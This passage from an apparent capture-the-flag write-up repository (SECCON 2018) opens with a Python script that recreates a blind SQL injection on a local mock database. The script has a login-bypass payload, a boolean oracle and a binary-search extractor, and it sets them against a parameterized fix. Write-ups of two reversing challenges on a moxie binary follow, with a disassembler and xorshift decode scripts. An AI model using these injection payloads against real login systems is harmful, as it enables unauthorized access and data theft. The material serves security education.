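        CREATE TABLE managers (id INTEGER PRIMARY KEY, login_id TEXT, password TEXT);
        INSERT INTO managers (login_id, password) VALUES ('admin', 'not-the-real-password');
        INSERT INTO flags (value) VALUES ('SECCON{example_flag}');
    """)
    return db


def login_vulnerable(db, login_id, password):
    # Assumed shape of the challenge's query: the password is interpolated inside
    # three parentheses, which is why the writeup's payloads start with ')))'.
    sql = ("SELECT id FROM managers WHERE login_id = '{}' "
           "AND password = ((('{}')))").format(login_id, password)
    return db.execute(sql).fetchone() is not None


def login_fixed(db, login_id, password):
    # Hardened form: placeholders keep user input out of the SQL grammar.
    sql = "SELECT id FROM managers WHERE login_id = ? AND password = ?"
    return db.execute(sql, (login_id, password)).fetchone() is not None


def make_oracle(db, login):
    """Boolean oracle: does the login succeed when `cond` is injected?
    MySQL payload on the page: ')))||(select case when (...) then 1 else 0 end)#
    In sqlite '||' is concatenation and '#' is not a comment, hence 'or' and '-- '."""
    def check(cond):
        payload = "'))) or (select case when ({}) then 1 else 0 end) -- ".format(cond)
        return login(db, "admin", payload)
    return check


def blind_extract(check, expr, max_len=256):
    """Read the string value of SQL expression `expr` one byte at a time.
    Binary search on the byte value costs about 8 queries per character instead
    of up to 255 with a linear scan; unicode() is sqlite's spelling of ascii()."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo <= hi:
            mid = (lo + hi) // 2
            if check("unicode(substr(({}),{},1)) > {}".format(expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid - 1
        if lo == 0:          # substr() past the end yields '' -> NULL -> no byte here
            break
        out += chr(lo)
    return out


# sqlite_master plays the role of information_schema.tables
TABLES = ("select group_concat(name) from "
          "(select name from sqlite_master where type = 'table' order by name)")
FLAG = "select value from flags limit 1"

if __name__ == "__main__":
    db = make_db()
    check = make_oracle(db, login_vulnerable)
    print("bypass works:", login_vulnerable(db, "admin", "'))) or 1 -- "))
    print("tables:", blind_extract(check, TABLES))
    print("flag:", blind_extract(check, FLAG))
    print("fixed login leaks:", repr(blind_extract(make_oracle(db, login_fixed), FLAG)))
```

Against `login_fixed` the same oracle never returns true, so `blind_extract` stops after the first character position with an empty result: the injected text is compared as a literal password instead of being parsed as SQL.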
-------------------------------------------------------------------------------- /seccon2018/special-device-file/README.md: -------------------------------------------------------------------------------- 1 | # Special Device File 2 | --- 3 | **Points:** 231 | **Solves:** 75/653 | **Category:** Reversing 4 | 5 | Special Device File 6 | 7 | Execute this file and get the flag. 8 | 9 | References: 10 | 11 | Assembly samples for many architectures 12 | http://kozos.jp/books/asm/cross-gcc494-v1.0.zip 13 | 14 | See the assembly samples. 15 | 16 | $ unzip cross-gcc494-v1.0.zip $ cd cross-gcc494/sample $ ls *.d 17 | 18 | See the sample programs running on GDB simulator. 19 | 20 | $ cd cross-gcc494/exec $ ls *.d 21 | 22 | [Download](runme_8a10b7425cea81a043db0fd352c82a370a2d3373) 23 | 24 | --- 25 | 26 | [Bahasa Indonesia](#bahasa-indonesia) 27 | 28 | ## English 29 | TODO 30 | 31 | 32 | ## Bahasa Indonesia 33 | TODO 34 | -------------------------------------------------------------------------------- /seccon2018/special-device-file/runme_8a10b7425cea81a043db0fd352c82a370a2d3373: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/special-device-file/runme_8a10b7425cea81a043db0fd352c82a370a2d3373 -------------------------------------------------------------------------------- /seccon2018/special-instructions/README.md: -------------------------------------------------------------------------------- 1 | # Special Instructions 2 | --- 3 | **Points:** 262 | **Solves:** 61/653 | **Category:** Reversing 4 | 5 | Execute this file and get the flag. 6 | 7 | References: Assembly samples for many architectures 8 | http://kozos.jp/books/asm/cross-gcc494-v1.0.zip 9 | 10 | See the assembly samples. 11 | 12 | ``` 13 | $ unzip cross-gcc494-v1.0.zip 14 | $ cd cross-gcc494/sample 15 | $ ls *.d 16 | ``` 17 | 18 | See the sample programs running on GDB simulator. 
19 | 
20 | ```
21 | $ cd cross-gcc494/exec
22 | $ ls *.d
23 | ```
24 | 
25 | [Download](runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be)
26 | 
27 | ---
28 | 
29 | [Bahasa Indonesia](#bahasa-indonesia)
30 | 
31 | ## English
32 | We were given a 32-bit ELF for an unknown architecture.
33 | ```sh
34 | $ file runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
35 | runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be: ELF 32-bit MSB executable, *unknown arch 0xdf* version 1 (SYSV), statically linked, not stripped
36 | ```
37 | 
38 | Basic recon with `strings` shows that the architecture is `moxie` (note the `moxie-elf.c` source file name).
39 | ```sh
40 | $ strings runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
41 | ,.U7
42 | 0123456789abcdef
43 | This program uses special instructions.
44 | SETRSEED: (Opcode:0x16)
45 |   RegA -> SEED
46 | GETRAND: (Opcode:0x17)
47 |   xorshift32(SEED) -> SEED
48 |   SEED -> RegA
49 | GCC: (GNU) 4.9.4
50 | moxie-elf.c
51 | ...
52 | ```
53 | 
54 | Neither `objdump` nor IDA could disassemble it, so we wrote our own [simple disassembler](disas_moxie.py) from [this documentation](http://moxielogic.org/blog/pages/architecture.html).
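Added example (editor's code, not the team's script or disassembler): a pure-Python reconstruction of the decode loop and the GETRAND generator that the disassembly and pseudocode below establish, plus a known-plaintext search that recovers the xorshift shift triple instead of trying variants by hand. Everything it uses is on this page: the seed 0x92d68ca2 passed to SETRSEED, the `flag` and `randval` byte arrays, and the `SECCON{` prefix. The shift triple (13, 17, 15) is the variant the write-up found to match; Marsaglia's textbook xorshift32 triple is (13, 17, 5), which is why guessing the variant is the real work here.

```python
# Constants taken from the disassembly: the seed loaded into $r0 before the
# SETRSEED call, and the two byte arrays passed to decode().
SEED = 0x92d68ca2
FLAG_ENC = bytes.fromhex("6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00")
RANDVAL = bytes.fromhex("3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108")
MASK32 = 0xffffffff


def xorshift32(state, shifts=(13, 17, 15)):
    """One GETRAND step: state -> new state for an (a, b, c) shift triple.
    (13, 17, 15) is the variant that matched this binary; (13, 17, 5) is the
    usual textbook choice."""
    a, b, c = shifts
    state ^= (state << a) & MASK32
    state ^= state >> b
    state ^= (state << c) & MASK32
    return state


def decode(enc, rand, seed=SEED, shifts=(13, 17, 15)):
    """Mirror the binary's decode() loop: out[i] = enc[i] ^ rand[i] ^ (GETRAND() & 0xff),
    stopping at the first NUL byte of the ciphertext (the loop tests the byte
    before decoding it)."""
    state = seed
    out = bytearray()
    for e, r in zip(enc, rand):
        if e == 0:
            break
        state = xorshift32(state, shifts)
        out.append(e ^ r ^ (state & 0xff))
    return bytes(out)


def find_shifts(enc, rand, known_prefix=b"SECCON{", seed=SEED):
    """Known-plaintext search over every (a, b, c) in 1..31: keep the triples
    whose decode starts with the flag prefix and is printable throughout.
    Cheap: the prefix check needs only len(known_prefix) generator steps."""
    n = len(known_prefix)
    hits = []
    for a in range(1, 32):
        for b in range(1, 32):
            for c in range(1, 32):
                if decode(enc[:n], rand, seed, (a, b, c)) != known_prefix:
                    continue
                full = decode(enc, rand, seed, (a, b, c))
                if all(0x20 <= x < 0x7f for x in full):
                    hits.append((a, b, c))
    return hits


if __name__ == "__main__":
    print("candidate shift triples:", find_shifts(FLAG_ENC, RANDVAL))
    print("flag:", decode(FLAG_ENC, RANDVAL).decode())
```

The search replaces the "try several implementations" step of the write-up: seven bytes of known plaintext are 56 bits of constraint against roughly 30k candidate triples, so the correct variant is identified directly from the ciphertext and seed.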
55 | ``` 56 | $ python disas_moxie.py 57 | function main 58 | 0x136c: 06 18 push $sp, $r6 59 | 0x136e: 91 18 dec $sp, 0x24 60 | 0x1370: 01 20 ldi.l $r0, 0x92d68ca2 61 | 0x1376: 03 00 jsra set_random_seed 62 | 0x137c: 01 80 ldi.l $r6, puts 63 | 0x1382: 01 20 ldi.l $r0, 0x1 64 | 0x1388: 01 30 ldi.l $r1, "This program uses special instructions.\n\n" 65 | 0x138e: 19 80 jsr $r6 66 | 0x1390: 01 20 ldi.l $r0, 0x1 67 | 0x1396: 01 30 ldi.l $r1, "SETRSEED: (Opcode:0x16)\n" 68 | 0x139c: 19 80 jsr $r6 69 | 0x139e: 01 20 ldi.l $r0, 0x1 70 | 0x13a4: 01 30 ldi.l $r1, " RegA -> SEED\n\n" 71 | 0x13aa: 19 80 jsr $r6 72 | 0x13ac: 01 20 ldi.l $r0, 0x1 73 | 0x13b2: 01 30 ldi.l $r1, "GETRAND: (Opcode:0x17)\n" 74 | 0x13b8: 19 80 jsr $r6 75 | 0x13ba: 01 20 ldi.l $r0, 0x1 76 | 0x13c0: 01 30 ldi.l $r1, " xorshift32(SEED) -> SEED\n" 77 | 0x13c6: 19 80 jsr $r6 78 | 0x13c8: 01 20 ldi.l $r0, 0x1 79 | 0x13ce: 01 30 ldi.l $r1, " SEED -> RegA\n\n" 80 | 0x13d4: 19 80 jsr $r6 81 | 0x13d6: 01 20 ldi.l $r0, flag 82 | 0x13dc: 01 30 ldi.l $r1, randval 83 | 0x13e2: 03 00 jsra decode 84 | 0x13e8: 02 32 mov $r1, $r0 85 | 0x13ea: 01 20 ldi.l $r0, 0x1 86 | 0x13f0: 19 80 jsr $r6 87 | 0x13f2: 01 20 ldi.l $r0, 0x1 88 | 0x13f8: 01 30 ldi.l $r1, "\n" 89 | 0x13fe: 19 80 jsr $r6 90 | 0x1400: 2e 22 xor $r0, $r0 91 | 0x1402: 03 00 jsra exit 92 | 93 | function decode 94 | 0x136c: 06 18 push $sp, $r6 95 | 0x136e: 06 19 push $sp, $r7 96 | 0x1370: 06 1a push $sp, $r8 97 | 0x1372: 06 1b push $sp, $r9 98 | 0x1374: 06 1c push $sp, $r10 99 | 0x1376: 06 1d push $sp, $r11 100 | 0x1378: 91 18 dec $sp, 0x24 101 | 0x137a: 02 d2 mov $r11, $r0 102 | 0x137c: 1c 42 ld.b $r2, ($r0) 103 | 0x137e: 2e 22 xor $r0, $r0 104 | 0x1380: 0e 42 cmp $r2, $r0 105 | 0x1382: c0 12 beq 0x??? 
106 | 0x1384: 02 a3 mov $r8, $r1 107 | 0x1386: 02 9d mov $r7, $r11 108 | 0x1388: 01 c0 ldi.l $r10, get_random_value 109 | 0x138e: 1c 8a ld.b $r6, ($r8) 110 | 0x1390: 2e 22 xor $r0, $r0 111 | 0x1392: 19 c0 jsr $r10 112 | 0x1394: 2e 82 xor $r6, $r0 113 | 0x1396: 1c 29 ld.b $r0, ($r7) 114 | 0x1398: 2e 82 xor $r6, $r0 115 | 0x139a: 1e 98 st.b ($r7), $r6 116 | 0x139c: 89 01 inc $r7, 0x1 117 | 0x139e: 8a 01 inc $r8, 0x1 118 | 0x13a0: 1c 39 ld.b $r1, ($r7) 119 | 0x13a2: 2e 22 xor $r0, $r0 120 | 0x13a4: 0e 32 cmp $r1, $r0 121 | 0x13a6: c7 f3 bne 0x??? 122 | 0x13a8: 02 2d mov $r0, $r11 123 | 0x13aa: 02 e0 mov $r12, $fp 124 | 0x13ac: 9e 18 dec $r12, 0x24 125 | 0x13ae: 07 ed pop $r12, $r11 126 | 0x13b0: 07 ec pop $r12, $r10 127 | 0x13b2: 07 eb pop $r12, $r9 128 | 0x13b4: 07 ea pop $r12, $r8 129 | 0x13b6: 07 e9 pop $r12, $r7 130 | 0x13b8: 07 e8 pop $r12, $r6 131 | 0x13ba: 04 00 ret 132 | 133 | function set_random_seed 134 | 0x136c: 16 20 ??? 135 | 0x136e: 04 00 ret 136 | 137 | function get_random_value 138 | 0x136c: 17 20 ??? 139 | 0x136e: 04 00 ret 140 | 141 | flag: 6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00 142 | randval: 3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108 143 | ``` 144 | 145 | The pseudocode roughly looks like this. 146 | ```python 147 | flag = "6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00" 148 | randval = "3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108" 149 | def main(): 150 | set_random_seed(0x92d68ca2) 151 | puts("...") 152 | puts(decode(flag, randval)) 153 | 154 | def decode(flag, randval): 155 | i = 0 156 | while flag[i]: 157 | flag[i] ^= randval[i] ^ get_random_value() 158 | i += 1 159 | return flag 160 | ``` 161 | 162 | Function `set_random_seed` and `get_random_value` are compiled with special instructions. 
From the strings inside the binary we know that:
163 | ```
164 | SETRSEED: (Opcode:0x16)
165 |   RegA -> SEED
166 | GETRAND: (Opcode:0x17)
167 |   xorshift32(SEED) -> SEED
168 |   SEED -> RegA
169 | ```
170 | 
171 | We tried several `xorshift32` implementations (there are many variants on the internet) until one produced the flag; the script below uses the matching shifts 13, 17 and 15.
172 | ```python
173 | import numpy as np
174 | 
175 | state = np.uint32(0x92d68ca2)  # seed passed to SETRSEED in main
176 | def xorshift():
177 |     global state
178 |     state ^= np.uint32(state << np.uint32(13))
179 |     state ^= np.uint32(state >> np.uint32(17))
180 |     state ^= np.uint32(state << np.uint32(15))
181 |     return np.uint32(state)
182 | 
183 | flag = bytes.fromhex("6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00")
184 | r = bytes.fromhex("3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108")
185 | 
186 | s = ""
187 | for i, c in enumerate(flag):
188 |     if c == 0:  # decode() stops at the ciphertext's NUL terminator
189 |         break
190 |     xorshift()
191 |     s += chr((c ^ r[i] ^ int(state)) & 0xff)
192 | print(s)
193 | ```
194 | 
195 | Flag: `SECCON{MakeSpecialInstructions}`
196 | 
197 | ## Bahasa Indonesia
198 | We were given a 32-bit ELF for an unknown architecture.
199 | ```sh
200 | $ file runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
201 | runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be: ELF 32-bit MSB executable, *unknown arch 0xdf* version 1 (SYSV), statically linked, not stripped
202 | ```
203 | 
204 | Using `strings`, we found that the architecture is `moxie`.
205 | ```sh
206 | $ strings runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
207 | ,.U7
208 | 0123456789abcdef
209 | This program uses special instructions.
210 | SETRSEED: (Opcode:0x16)
211 |   RegA -> SEED
212 | GETRAND: (Opcode:0x17)
213 |   xorshift32(SEED) -> SEED
214 |   SEED -> RegA
215 | GCC: (GNU) 4.9.4
216 | moxie-elf.c
217 | ...
```

We could not disassemble it with `objdump` or `IDA`, so we decided to write [our own disassembler](disas_moxie.py) by reading [this documentation](http://moxielogic.org/blog/pages/architecture.html).
```
$ python disas_moxie.py
function main
0x136c: 06 18  push $sp, $r6
0x136e: 91 18  dec $sp, 0x24
0x1370: 01 20  ldi.l $r0, 0x92d68ca2
0x1376: 03 00  jsra set_random_seed
0x137c: 01 80  ldi.l $r6, puts
0x1382: 01 20  ldi.l $r0, 0x1
0x1388: 01 30  ldi.l $r1, "This program uses special instructions.\n\n"
0x138e: 19 80  jsr $r6
0x1390: 01 20  ldi.l $r0, 0x1
0x1396: 01 30  ldi.l $r1, "SETRSEED: (Opcode:0x16)\n"
0x139c: 19 80  jsr $r6
0x139e: 01 20  ldi.l $r0, 0x1
0x13a4: 01 30  ldi.l $r1, " RegA -> SEED\n\n"
0x13aa: 19 80  jsr $r6
0x13ac: 01 20  ldi.l $r0, 0x1
0x13b2: 01 30  ldi.l $r1, "GETRAND: (Opcode:0x17)\n"
0x13b8: 19 80  jsr $r6
0x13ba: 01 20  ldi.l $r0, 0x1
0x13c0: 01 30  ldi.l $r1, " xorshift32(SEED) -> SEED\n"
0x13c6: 19 80  jsr $r6
0x13c8: 01 20  ldi.l $r0, 0x1
0x13ce: 01 30  ldi.l $r1, " SEED -> RegA\n\n"
0x13d4: 19 80  jsr $r6
0x13d6: 01 20  ldi.l $r0, flag
0x13dc: 01 30  ldi.l $r1, randval
0x13e2: 03 00  jsra decode
0x13e8: 02 32  mov $r1, $r0
0x13ea: 01 20  ldi.l $r0, 0x1
0x13f0: 19 80  jsr $r6
0x13f2: 01 20  ldi.l $r0, 0x1
0x13f8: 01 30  ldi.l $r1, "\n"
0x13fe: 19 80  jsr $r6
0x1400: 2e 22  xor $r0, $r0
0x1402: 03 00  jsra exit

function decode
0x136c: 06 18  push $sp, $r6
0x136e: 06 19  push $sp, $r7
0x1370: 06 1a  push $sp, $r8
0x1372: 06 1b  push $sp, $r9
0x1374: 06 1c  push $sp, $r10
0x1376: 06 1d  push $sp, $r11
0x1378: 91 18  dec $sp, 0x24
0x137a: 02 d2  mov $r11, $r0
0x137c: 1c 42  ld.b $r2, ($r0)
0x137e: 2e 22  xor $r0, $r0
0x1380: 0e 42  cmp $r2, $r0
0x1382: c0 12  beq 0x???
0x1384: 02 a3  mov $r8, $r1
0x1386: 02 9d  mov $r7, $r11
0x1388: 01 c0  ldi.l $r10, get_random_value
0x138e: 1c 8a  ld.b $r6, ($r8)
0x1390: 2e 22  xor $r0, $r0
0x1392: 19 c0  jsr $r10
0x1394: 2e 82  xor $r6, $r0
0x1396: 1c 29  ld.b $r0, ($r7)
0x1398: 2e 82  xor $r6, $r0
0x139a: 1e 98  st.b ($r7), $r6
0x139c: 89 01  inc $r7, 0x1
0x139e: 8a 01  inc $r8, 0x1
0x13a0: 1c 39  ld.b $r1, ($r7)
0x13a2: 2e 22  xor $r0, $r0
0x13a4: 0e 32  cmp $r1, $r0
0x13a6: c7 f3  bne 0x???
0x13a8: 02 2d  mov $r0, $r11
0x13aa: 02 e0  mov $r12, $fp
0x13ac: 9e 18  dec $r12, 0x24
0x13ae: 07 ed  pop $r12, $r11
0x13b0: 07 ec  pop $r12, $r10
0x13b2: 07 eb  pop $r12, $r9
0x13b4: 07 ea  pop $r12, $r8
0x13b6: 07 e9  pop $r12, $r7
0x13b8: 07 e8  pop $r12, $r6
0x13ba: 04 00  ret

function set_random_seed
0x136c: 16 20  ???
0x136e: 04 00  ret

function get_random_value
0x136c: 17 20  ???
0x136e: 04 00  ret

flag: 6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00
randval: 3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108
```

The pseudocode roughly looks like this.
```python
flag = "6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00"
randval = "3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108"
def main():
    set_random_seed(0x92d68ca2)
    puts("...")
    puts(decode(flag, randval))

def decode(flag, randval):
    i = 0
    while flag[i]:
        flag[i] ^= randval[i] ^ get_random_value()
        i += 1
    return flag
```

The functions `set_random_seed` and `get_random_value` are compiled with special instructions.
From the strings inside the binary, we get the hint that:
```
SETRSEED: (Opcode:0x16)
    RegA -> SEED
GETRAND: (Opcode:0x17)
    xorshift32(SEED) -> SEED
    SEED -> RegA
```

We tried several `xorshift32` implementations (there are several variants of that function on the internet), then we got the flag with this script.
```python
MASK = 0xFFFFFFFF

# GETRAND: xorshift32 over the 32-bit SEED. The shift triple (13, 17, 15) is the
# variant that produced readable output; only the low byte of each result is used.
state = 0x92d68ca2
def xorshift():
    global state
    state ^= (state << 13) & MASK
    state ^= state >> 17
    state ^= (state << 15) & MASK
    return state

flag = bytes.fromhex("6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00")
r = bytes.fromhex("3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108")

s = ""
for i, c in enumerate(flag):
    if c == 0:  # decode() stops at the NUL terminator
        break
    xorshift()
    s += chr((c ^ r[i] ^ state) & 0xff)
print(s)
```

Flag: `SECCON{MakeSpecialInstructions}`
--------------------------------------------------------------------------------
/seccon2018/special-instructions/disas_moxie.py:
--------------------------------------------------------------------------------
import string
from pwn import *
context.log_level = 'critical'

def disas(code, address, e):
    # code: the raw bytes of one function; address: its virtual address in the ELF.
    # Moxie instructions are 16-bit big-endian words, some followed by an
    # immediate; `add` below is the size of that immediate in bytes.
    s = code
    base = address

    def reg(x):
        # Register encoding: 0 = $fp, 1 = $sp, 2..15 = $r0..$r13
        if x == 0:
            return "$fp"
        elif x == 1:
            return "$sp"
        elif x <= 15:
            return "$r%d" % (x-2)
        return "$r???"

    def addr(start, length):
        # Decode a big-endian immediate of `length` bytes, then try to show it as
        # a symbol name or a printable NUL-terminated string; fall back to hex.
        x = bytes(s[start:start+length])
        x = x[::-1]  # pwntools unpackers are little-endian by default; the ELF is MSB
        if length == 1:
            a = u8(x)
        elif length == 2:
            a = u16(x)
        elif length == 4:
            a = u32(x)
        elif length == 8:
            a = u64(x)
        else:
            assert False
        for name, value in e.symbols.items():
            if value == a:
                return name

        st = ""
        cur = a
        while 1:
            try:
                c = e.read(cur, 1)
            except Exception:
                return hex(a)  # not a mapped address
            if c[0] == 0:
                break
            ch = chr(c[0])
            if ch not in string.printable:
                return hex(a)
            st += ch
            cur += 1
        return '"%s"' % st.replace("\n", "\\n")

    s = list(s)  # bytes -> list of ints
    i = 0
    while i < len(s):
        ins = s[i]
        ins = bin(ins)[2:]
        ins = ins.zfill(8)  # opcode bits of the first byte as a string of 0/1
        add = 0

        if ins.startswith("00100110"):
            mnemonic = "and %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00000101"):
            mnemonic = "add %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00101000"):
            mnemonic = "ashl %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00101101"):
            mnemonic = "ashr %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("110000"):
            mnemonic = "beq 0x???"
        elif ins.startswith("110110"):
            mnemonic = "bge 0x???"
        elif ins.startswith("111000"):
            mnemonic = "bgeu 0x???"
        elif ins.startswith("110011"):
            mnemonic = "bgt 0x???"
        elif ins.startswith("110101"):
            mnemonic = "bgtu 0x???"
        elif ins.startswith("110111"):
            mnemonic = "ble 0x???"
        elif ins.startswith("111001"):
            mnemonic = "bleu 0x???"
        elif ins.startswith("110010"):
            mnemonic = "blt 0x???"
        elif ins.startswith("110100"):
            mnemonic = "bltu 0x???"
        elif ins.startswith("110001"):
            mnemonic = "bne 0x???"
        elif ins.startswith("00110101"):
            mnemonic = "brk"
        elif ins.startswith("00001110"):
            mnemonic = "cmp %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("1001"):
            # register in the low nibble of the first byte, 8-bit immediate in the
            # second; hex() the immediate (the old "0x%s" printed it in decimal)
            mnemonic = "dec %s, %s" % (reg(s[i] & 0xF), hex(s[i+1]))
        elif ins.startswith("00110001"):
            mnemonic = "div %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("1010"):
            mnemonic = "gsr %s, %s" % (reg(s[i] & 0xF), reg(s[i+1]))
        elif ins.startswith("1000"):
            mnemonic = "inc %s, %s" % (reg(s[i] & 0xF), hex(s[i+1]))
        elif ins.startswith("00100101"):
            mnemonic = "jmp %s" % (reg(s[i+1] & 0xF))
        elif ins.startswith("00011010"):
            mnemonic = "jmpa 0x???"
            add = 4
        elif ins.startswith("00011001"):
            mnemonic = "jsr %s" % (reg(s[i+1] >> 4))
        elif ins.startswith("00000011"):
            mnemonic = "jsra %s" % (addr(i+2, 4))
            add = 4
        elif ins.startswith("00011100"):
            mnemonic = "ld.b %s, (%s)" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00001010"):
            mnemonic = "ld.l %s, (%s)" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00100001"):
            mnemonic = "ld.s %s, (%s)" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00011101"):
            mnemonic = "lda.b"
            add = 4
        elif ins.startswith("00001000"):
            mnemonic = "lda.l"
            add = 4
        elif ins.startswith("00100010"):
            mnemonic = "lda.s"
            add = 4
        elif ins.startswith("00000001"):
            mnemonic = "ldi.l %s, %s" % (reg(s[i+1] >> 4), addr(i+2, 4))
            add = 4
        elif ins.startswith("00011011"):
            mnemonic = "ldi.b"
            add = 4
        elif ins.startswith("00100000"):
            mnemonic = "ldi.s"
            add = 4
        elif ins.startswith("00110110"):
            mnemonic = "ldo.b"
            add = 2
        elif ins.startswith("00001100"):
            mnemonic = "ldo.l"
            add = 2
        elif ins.startswith("00111000"):
            mnemonic = "ldo.s"
            add = 2
        elif ins.startswith("00100111"):
            mnemonic = "lshr %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00110011"):
            mnemonic = "mod %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00000010"):
            mnemonic = "mov %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00101111"):
            mnemonic = "mul %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00010101"):
            mnemonic = "mul.x %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00101010"):
            mnemonic = "neg %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00001111"):
            mnemonic = "nop"
        elif ins.startswith("00101100"):
            mnemonic = "not %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00101011"):
            mnemonic = "or %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00000111"):
            mnemonic = "pop %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00000110"):
            mnemonic = "push %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00000100"):
            mnemonic = "ret"
        elif ins.startswith("00010000"):
            mnemonic = "sex.b %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00010001"):
            mnemonic = "sex.s %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("1011"):
            mnemonic = "ssr %s, %s" % (reg(s[i] & 0xF), reg(s[i+1]))
        elif ins.startswith("00011110"):
            mnemonic = "st.b (%s), %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00001011"):
            mnemonic = "st.l (%s), %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00100011"):
            mnemonic = "st.s (%s), %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00011111"):
            mnemonic = "sta.b 0x???"
            add = 4
        elif ins.startswith("00001001"):
            mnemonic = "sta.l 0x???"
            add = 4
        elif ins.startswith("00100100"):
            mnemonic = "sta.s 0x???"
            add = 4
        elif ins.startswith("00110111"):
            mnemonic = "sto.b 0x???"
            add = 2
        elif ins.startswith("00001101"):
            mnemonic = "sto.l 0x???"
            add = 2
        elif ins.startswith("00111001"):
            mnemonic = "sto.s 0x???"
            add = 2
        elif ins.startswith("00101001"):
            mnemonic = "sub %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00110000"):
            mnemonic = "swi ???"
            add = 4
        elif ins.startswith("00110010"):
            mnemonic = "udiv %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00110100"):
            mnemonic = "umod %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00010100"):
            mnemonic = "umul.x %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00101110"):
            mnemonic = "xor %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00010010"):
            mnemonic = "zex.b %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        elif ins.startswith("00010011"):
            mnemonic = "zex.s %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF))
        else:
            # unknown opcode; this is where the challenge's custom
            # SETRSEED (0x16) and GETRAND (0x17) instructions land
            mnemonic = "???"

        print("%s:\t%s\t%s" % (hex(base+i), hex(s[i])[2:].zfill(2) + " " + hex(s[i+1])[2:].zfill(2), mnemonic))
        i += add + 2
    print()

e = ELF('runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be')

def disas_function(name, address, length):
    print("function", name)
    disas(e.read(address, length), address, e)

def print_symbol(name, address, length):
    print("%s:" % name, e.read(address, length).hex())

disas_function("main", 0x000015a2, 156)
disas_function("decode", 0x00001552, 80)
disas_function("set_random_seed", 0x0000154a, 4)
disas_function("get_random_value", 0x0000154e, 4)
print_symbol("flag", e.symbols['flag'], 32)
print_symbol("randval", e.symbols['randval'], 32)
--------------------------------------------------------------------------------
/seccon2018/special-instructions/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/special-instructions/runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be
--------------------------------------------------------------------------------
/seccon2018/tctktoy/README.md:
--------------------------------------------------------------------------------
# tctkToy
